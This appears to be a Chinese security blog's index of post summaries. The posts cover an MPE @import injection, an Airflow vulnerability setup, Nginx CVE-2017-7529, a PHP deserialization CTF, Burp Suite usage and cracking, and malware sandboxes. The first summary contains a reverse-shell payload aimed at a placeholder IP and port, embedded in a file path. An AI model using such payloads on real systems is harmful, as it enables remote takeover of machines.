摘要:
@import "$(bash -c 'bash -i >*& /dev/tcp/yourip/yourport 0>&1'| exit 0) Python.pdf" The following comment will be recognised by MPE as valid "@import" 阅读全文
摘要:
偶尔在启动IDEA或PyCharm时,会遇到java.net.BindException: Address already in use: bind错误而无法启动。 解决办法 方式一: 重启电脑 可能会遇到多次重启电脑仍出现无法启动的情况,但是,一般绝对可行 方式二: 很多情况下,我们已经开启了很多 阅读全文
摘要:
前提说明:该姿势并无安全问题,短密码生成的前提是知道原密码(即文中的长密码) 前景提要 Positive Technologies 的网络安全研究员 Arseniy Sharoglazov 近日在社交平台分享了一个简单的实验并指出,加密的 ZIP 文件可能存在两个正确的密码,并且都可以提取出相同的结 阅读全文
摘要:
1. 漏洞环境 fofa key: title="Airflow - DAGs" || body="Apache Airflow" 采用本地搭建漏洞测试环境 # 获取yaml文档 curl -LfO 'https://airflow.apache.org/docs/apache-airflow/2. 阅读全文
摘要:
本文转载于[Burp Suite完整教程] Intruder Attack type和Payloads – 拥有上千种姿态的攻击模式 转载本文的原因是,在实战过程中,利用Burp Suite同时探测内网C段和端口的姿势不够熟悉,转载了一篇比较完善的文章,用于自己学习,顺便记录一下。 今天要介绍Int 阅读全文
摘要:
0x00、发现问题 重装Burp Suite时发现,使用burploader.jar进行注册破解,突然发现无法打开jar文件。 0x01、排查环境变量 首先排查JDK的环境变量,查看JAVA_HOME、CLASSPATH、PATH中的环境变量: JAVA_HOME: E:\openJDK\jdk11 阅读全文
摘要:
CVE-2017-7529 本文首发于freebuf Nginx安全性分析 影响版本:0.5.6-1.13.2 漏洞危害:敏感信息泄露 HTTP-Range HTTP的Range 允许客户端分批次请求资源的一部分,如果服务端资源较大,可以通过Range来并发下载;如果访问资源时网络中断,可以断点续传 阅读全文
摘要:
题目给定了以下源码: <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function _ 阅读全文
摘要:
一些常用的沙箱检测 微步沙盒: https://s.threatbook.cn/ 腾讯哈勃分析系统: https://habo.qq.com/ ==》要md5,GG!!!还是算了,不太友好!!! 魔盾: https://www.maldun.com/analysis/ 微点沙盒: https://s 阅读全文
摘要:
目前4个offer了,说明一下状况: 安恒信息 杭州 安恒云部门 安恒信息 北京 安全服务部门 奇安信 重庆 安全服务部门 中安网星 北京 安全部门 由于疫情因素,个人不是很想去北京,不过中安网星可以远程,还给配电脑,因为不是很了解中安网星,所以还是去安恒信息了。 阅读全文